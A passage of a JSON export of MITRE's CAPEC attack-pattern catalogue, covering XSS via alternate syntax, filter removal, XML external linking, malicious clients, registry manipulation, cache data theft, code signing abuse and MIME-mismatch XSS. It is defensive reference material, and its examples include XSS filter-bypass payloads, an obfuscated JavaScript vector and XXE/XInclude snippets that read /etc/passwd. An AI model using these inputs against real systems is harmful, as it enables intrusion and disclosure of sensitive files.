succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target client software must allow scripting such as JavaScript."},"Skills_Required":{"Skill":["To inject the malicious payload in a web page",{"Level":"Low"},"To bypass non trivial filters in the application",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to send HTTP request to a web application."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.","Implementation: Perform input validation for all remote content, including remote and user-generated content","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this."]},"Example_Instances":{"Example":{"p":["In this example, the attacker tries to get <script>alert(1)<\/script> executed by the victim\'s browser. The target application employs regular expressions to make sure no script is being passed through the application to the web page; such a regular expression could be ((?i)script), and the application would replace all matches by this regex by the empty string. An attacker will then create a special payload to bypass this filter:","when the applications gets this input string, it will replace all \\"script\\" (case insensitive) by the empty string and the resulting input will be the desired vector by the attacker:","In this example, we assume that the application needs to write a particular string in a client-side JavaScript context (e.g., <script>HERE<\/script>). For the attacker to execute the same payload as in the previous example, they would need to send alert(1) if there was no filtering. The application makes use of the following regular expression as filter","and replaces all matches by the empty string. For example each occurrence of alert(), eval(), foo() or even the string \\"alert\\" would be stripped. An attacker will then create a special payload to bypass this filter:","when the applications gets this input string, it won\'t replace anything and this piece of JavaScript has exactly the same runtime meaning as alert(1). The attacker could also have used non-alphanumeric XSS vectors to bypass the filter; for example,","would be executed by the JavaScript engine like alert(1) is."],"div":["<scriscriptpt>alert(1)</scscriptript>",{"style":"margin-left:10px;","class":"attack"},"<script>alert(1)<\/script>",{"style":"margin-left:10px;","class":"result"},"((\\\\w+)\\\\s*\\\\(.*\\\\)|alert|eval|function|document)",{"style":"margin-left:10px;","class":"mitigation"},"this[\'al\' + \'ert\'](1)",{"style":"margin-left:10px;","class":"attack"},"($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!\'\'+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"87"}},"References":{"Reference":[{"External_Reference_ID":"REF-69","Section":"XSS Filter Evasion Cheat Sheet"},{"External_Reference_ID":"REF-70","Section":"Testing for Cross site scripting"},{"External_Reference_ID":"REF-71"},{"External_Reference_ID":"REF-72","Section":"WASC-08 - Cross Site Scripting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"}],"Previous_Entry_Name":["Cross-Site Scripting Using Alternate Syntax",{"Date":"2017-05-01"}]}},"200":{"ID":"200","Name":"Removal of filters: Input filters, output filters, data masking","Abstraction":"Detailed","Status":"Draft","Description":"An attacker removes or disables filtering mechanisms on the target application. Input filters prevent invalid data from being sent to an application (for example, overly large inputs that might cause a buffer overflow or other malformed inputs that may not be correctly handled by an application). Input filters might also be designed to constrained executable content. For example, if an application accepts scripting languages as input, an input filter could constrain the commands received and block those that the application\'s administrator deems to be overly powerful. An output filter screens responses from an application or person in order to prevent disclosure of sensitive information. For example, an application\'s output filter might block output that is sourced to sensitive folders or which contains certain keywords. A data mask is similar to an output filter, but usually applies to structured data, such as found in databases. Data masks elide or replace portions of the information returned from a query in order to protect against the disclosure of sensitive information. If an input filter is removed the attacker will be able to send content to the target and have the target utilize it without it being sanitized. If the content sent by the attacker is executable, the attacker may be able to execute arbitrary commands on the target. If an output filter or data masking mechanism is disabled, the target may send out sensitive information that would otherwise be elided by the filters. If the data mask is disabled, sensitive information stored in a database would be returned unaltered. This could result in the disclosure of sensitive information, such as social security numbers of payment records. This attack is usually executed as part of a larger attack series. The attacker would disable filters and would then mount additional attacks to either insert commands or data or query the target application in ways that would otherwise be prevented by the filters.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"207"}},"Prerequisites":{"Prerequisite":"The target application must utilize some sort of filtering mechanism (input, output, or data masking)."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}]}},"201":{"ID":"201","Name":"Serialized Data External Linking","Abstraction":"Detailed","Status":"Draft","Description":"An adversary creates a serialized data file (e.g. XML, YAML, etc...) that contains an external data reference. Because serialized data parsers may not validate documents with external references, there may be no checks on the nature of the reference in the external data. This can allow an adversary to open arbitrary files or connections, which may further lead to the adversary gaining access to information on the system that they would normally be unable to obtain.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"231"},{"Nature":"ChildOf","CAPEC_ID":"278"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an adversary records all instances of web services that process requests with serialized data.","Technique":["Use an automated tool to record all instances of URLs that process requests with serialized data.","Use a browser to manually explore the website and analyze how the application processes serialized data requests."]},{"Step":"2","Phase":"Exploit","Description":"[Craft malicious payload] The adversary crafts malicious data message that contains references to sensitive files."},{"Step":"3","Phase":"Exploit","Description":"[Launch an External Linking attack] Send the malicious crafted message containing the reference to a sensitive file to the target URL."}]},"Prerequisites":{"Prerequisite":"The target must follow external data references without validating the validity of the reference target."},"Skills_Required":{"Skill":["To send serialized data messages with maliciously crafted schema.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Configure the serialized data processor to only retrieve external entities from trusted sources."},"Example_Instances":{"Example":[{"p":["The following DTD would attempt to open the /dev/tty device:","A malicious actor could use this crafted DTD to reveal sensitive information."],"div":["<!DOCTYPE doc [ <!ENTITY ent SYSTEM \\"file:///dev/tty\\"> ]>",{"style":"margin-left:10px;","class":"informative"}]},{"p":"The following XML snippet would attempt to open the /etc/passwd file:","div":["<foo xmlns:xi=\\"http://www.w3.org/2001/XInclude\\"> <xi:include parse=\\"text\\" href=\\"file:///etc/passwd\\"/></foo>",{"style":"margin-left:10px;","class":"informative"}]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"References":{"Reference":[{"External_Reference_ID":"REF-73"},{"External_Reference_ID":"REF-74"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Examples-Instances, Injection_Vector, Methods_of_Attack, Payload, Payload_Activation_Impact, Resources_Required, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Execution_Flow, Mitigations, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Consequences, Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Prerequisites"}],"Previous_Entry_Name":["XML Entity Blowup",{"Date":"2018-07-31"},"XML Entity Linking",{"Date":"2020-07-30"}]}},"202":{"ID":"202","Name":"Create Malicious Client","Abstraction":"Standard","Status":"Draft","Description":"An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures. For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality. For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"22","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary."},"Resources_Required":{"Resource":"The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"602"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"203":{"ID":"203","Name":"Manipulate Registry Information","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"176","Exclude_Related":[{"Exclude_ID":"437"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":["The targeted application must rely on values stored in a registry.","The adversary must have a means of elevating permissions in order to access and modify registry content through either administrator privileges (e.g., credentialed access), or a remote access tool capable of editing a registry through an API."]},"Skills_Required":{"Skill":["The adversary requires privileged credentials or the development/acquiring of a tailored remote access tool.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Mitigations":{"Mitigation":["Ensure proper permissions are set for Registry hives to prevent users from modifying keys.","Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.","Employ robust identification and audit/blocking using an allowlist of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern."]},"Example_Instances":{"Example":"Manipulating registration information can be undertaken in advance of a path traversal attack (inserting relative path modifiers) or buffer overflow attack (enlarging a registry value beyond an application\'s ability to store it)."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"15"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1112","Entry_Name":"Modify Registry"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Activation_Zone, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, References, Related_Weaknesses, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Related_Attack_Patterns"}],"Previous_Entry_Name":["Manipulate Application Registry Values",{"Date":"2018-07-31"}]}},"204":{"ID":"204","Name":"Lifting Sensitive Data Embedded in Cache","Abstraction":"Detailed","Status":"Draft","Description":"An attacker examines a target application\'s cache for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"167"},{"Nature":"CanPrecede","CAPEC_ID":"560"}]},"Prerequisites":{"Prerequisite":["The target application must store sensitive information in a cache.","The cache must be inadequately protected against attacker access."]},"Resources_Required":{"Resource":"The attacker must be able to reach the target application\'s cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"524"},{"CWE_ID":"311"},{"CWE_ID":"1239"},{"CWE_ID":"1258"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Lifting cached, sensitive data embedded in client distributions (thick or thin)",{"Date":"2015-11-09"}]}},"206":{"ID":"206","Name":"Signing Malicious Code","Abstraction":"Detailed","Status":"Draft","Description":"The adversary extracts credentials used for code signing from a production environment and then uses these credentials to sign malicious content with the developer\'s key. Many developers use signing keys to sign code or hashes of code. When users or applications verify the signatures are accurate they are led to believe that the code came from the owner of the signing key and that the code has not been modified since the signature was applied. If the adversary has extracted the signing credentials then they can use those credentials to sign their own code bundles. Users or tools that verify the signatures attached to the code will likely assume the code came from the legitimate developer and install or run the code, effectively allowing the adversary to execute arbitrary code on the victim\'s computer. This differs from CAPEC-673, because the adversary is performing the code signing.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary first attempts to obtain a digital certificate in order to sign their malware or tools. This certificate could be stolen, created by the adversary, or aquired normally through a certificate authority."},{"Step":"2","Phase":"Explore","Description":"Based on the type of certificate obtained, the adversary will create a goal for their attack. This is either a broad or targeted attack. If an adversary was able to steal a certificate from a targeted organization, they could target this organization by pretending to have legitimate code signed by them. In other cases, the adversary would simply sign their malware and pose as legitimate software such that any user might trust it. This is the more broad approach"},{"Step":"3","Phase":"Experiment","Description":"The adversary creates their malware and signs it with the obtained digital certificate. The adversary then checks if the code that they signed is valid either through downloading from the targeted source or testing locally."},{"Step":"4","Phase":"Exploit","Description":"Once the malware has been signed, it is then deployed to the desired location. They wait for a trusting user to run their malware, thinking that it is legitimate software. This malware could do a variety of things based on the motivation of the adversary."}]},"Prerequisites":{"Prerequisite":"The targeted developer must use a signing key to sign code bundles. (Note that not doing this is not a defense - it only means that the adversary does not need to steal the signing key before forging code bundles in the developer\'s name.)"},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"732"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1553.002","Entry_Name":"Subvert Trust Controls:Code Signing"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description, Prerequisites, Related_Attack_Patterns"}],"Previous_Entry_Name":["Lifting signing key and signing malicious code from a production environment",{"Date":"2018-07-31"}]}},"207":{"ID":"207","Name":"Removing Important Client Functionality","Abstraction":"Standard","Status":"Draft","Description":"An attacker removes or disables functionality on the client that the server assumes to be present and trustworthy. Attackers can, in some cases, get around logic put in place to \'guard\' sensitive functionality or data. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an attacker can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"22","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Probing] The attacker probes, through brute-forcing, reverse-engineering or other similar means, the functionality on the client that server assumes to be present and trustworthy.","Technique":["The attacker probes by exploring an application\'s functionality and its underlying mapping to server-side components.","The attacker reverse engineers client-side code to identify the functionality that the server relies on for the proper or secure operation."]},{"Step":"2","Phase":"Experiment","Description":"[Determine which functionality to disable or remove] The attacker tries to determine which functionality to disable or remove through reverse-engineering from the list of functionality identified in the Explore phase.","Technique":"The attacker reverse engineers the client-side code to determine which functionality to disable or remove."},{"Step":"3","Phase":"Exploit","Description":"[Disable or remove the critical functionality from the client code] Once the functionality has been determined, the attacker disables or removes the critical functionality from the client code to perform malicious actions that the server believes are prohibited.","Technique":"The attacker disables or removes the functionality from the client-side code to perform malicious actions, such as sending of dangerous content (such as scripts) to the server."}]},"Prerequisites":{"Prerequisite":"The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client."},"Skills_Required":{"Skill":["To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on.",{"Level":"High"},"The attacker installs a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The attacker must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.","Design: Ship client-side application with integrity checks (code signing) when possible.","Design: Use obfuscation and other techniques to prevent reverse engineering the client code."]},"Example_Instances":{"Example":["Attacker reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.","Attacker uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they\'re not authorized to use, the Attacker directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks).","Attacker reverse-engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"602"}},"References":{"Reference":[{"External_Reference_ID":"REF-75","Section":"Greasemonkey"},{"External_Reference_ID":"REF-76"},{"External_Reference_ID":"REF-77","Section":"Greasemonkey"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, References, Related_Vulnerabilities"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences, Related_Attack_Patterns"}],"Previous_Entry_Name":["Removing Important Functionality from the Client",{"Date":"2015-12-07"}]}},"208":{"ID":"208","Name":"Removing/short-circuiting \'Purse\' logic: removing/mutating \'cash\' decrements","Abstraction":"Detailed","Status":"Draft","Description":"An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"207"}},"Prerequisites":{"Prerequisite":"The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations."},"Resources_Required":{"Resource":"The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client\'s purse logic. Reverse engineering tools would be necessary for this."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"602"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}]}},"209":{"ID":"209","Name":"XSS Using MIME Type Mismatch","Abstraction":"Detailed","Status":"Draft","Description":"An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary\'s script may run on the target unsanitized, possibly revealing the victim\'s cookies or executing arbitrary script in their browser.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"592"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary identifies a webpage that allows uploading content through an HTTP POST request. This is typically a blog or forum where other users will access the uploaded content."},{"Step":"2","Phase":"Experiment","Description":"The adversary creates a file with scripting content that they wish to be executed on other users\' web browsers. This file is then uploaded through a POST request and the MIME type is specified as a file type that cannot execute scripting content, such as text/plain."},{"Step":"3","Phase":"Experiment","Description":"The adversary then attempts to access the uploaded content to see if the browser correctly executes their desired scripting content"},{"Step":"4","Phase":"Exploit","Description":"Once the adversary has determined that their uploaded script will run when accessed, they either wait for users to access the content on their own or they target users to access their content through phishing emails."},{"Step":"5","Phase":"Exploit","Description":"The adversary\'s script can do just about anything, but a common use is to read a user\'s cookies which may contain a token. This can then be used to launch a Cross Site Request Forgery Attack."}]},"Prerequisites":{"Prerequisite":["The victim must follow a crafted link that references a scripting file that is mis-typed as a non-executable file.","The victim\'s browser must detect the true type of a mis-labeled scripting file and invoke the appropriate script interpreter without first performing filtering on the content."]},"Resources_Required":{"Resource":"The adversary must have the ability to source the file of the incorrect MIME type containing a script."},"Example_Instances":{"Example":["For example, the MIME type text/plain may be used where the actual content is text/javascript or text/html. Since text does not contain scripting instructions, the stated MIME type would indicate that filtering is unnecessary. However, if the target application subsequently determines the file\'s real type and invokes the appropriate interpreter, scripted content could be invoked.","In another example, img tags in HTML content could reference a renderable type file instead of an expected image file. The file extension and MIME type can describe an image file, but the file content can be text/javascript or text/html resulting in script execution. If the browser assumes all references in img tags are images, and therefore do not need to be filtered for scripts, this would bypass content filters."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"79"},{"CWE_ID":"20"},{"CWE_ID":"646"}]},"References":{"Reference":{"External_Reference_ID":"REF-78","Section":"Testing for Stored Cross site scripting (OWASP-DV-002)"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Cross-Site Scripting Using MIME Type Mismatch",{"Date":"2017-05-01"}]}},"212":{"ID":"212","Name":"Functionality Misuse","Abstraction":"Meta","Status":"Stable","Description":"An adversary leverages a legitimate capability of an application in such a way as to achieve a negative technical impact. The system functionality is not altered or modified but used in a way that was not intended. This is often accomplished through the overuse of a specific functionality or by leveraging functionality with design flaws that enables the adversary to gain access to unauthorized, 